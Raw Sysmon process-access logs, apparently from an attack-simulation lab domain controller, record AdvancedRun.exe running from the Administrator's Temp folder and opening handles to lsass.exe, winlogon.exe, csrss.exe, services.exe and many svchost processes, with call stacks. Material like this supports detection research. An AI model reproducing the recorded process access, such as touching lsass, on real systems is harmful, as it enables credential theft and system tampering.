20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004067426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.650{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.649{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.646{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.645{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067417Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 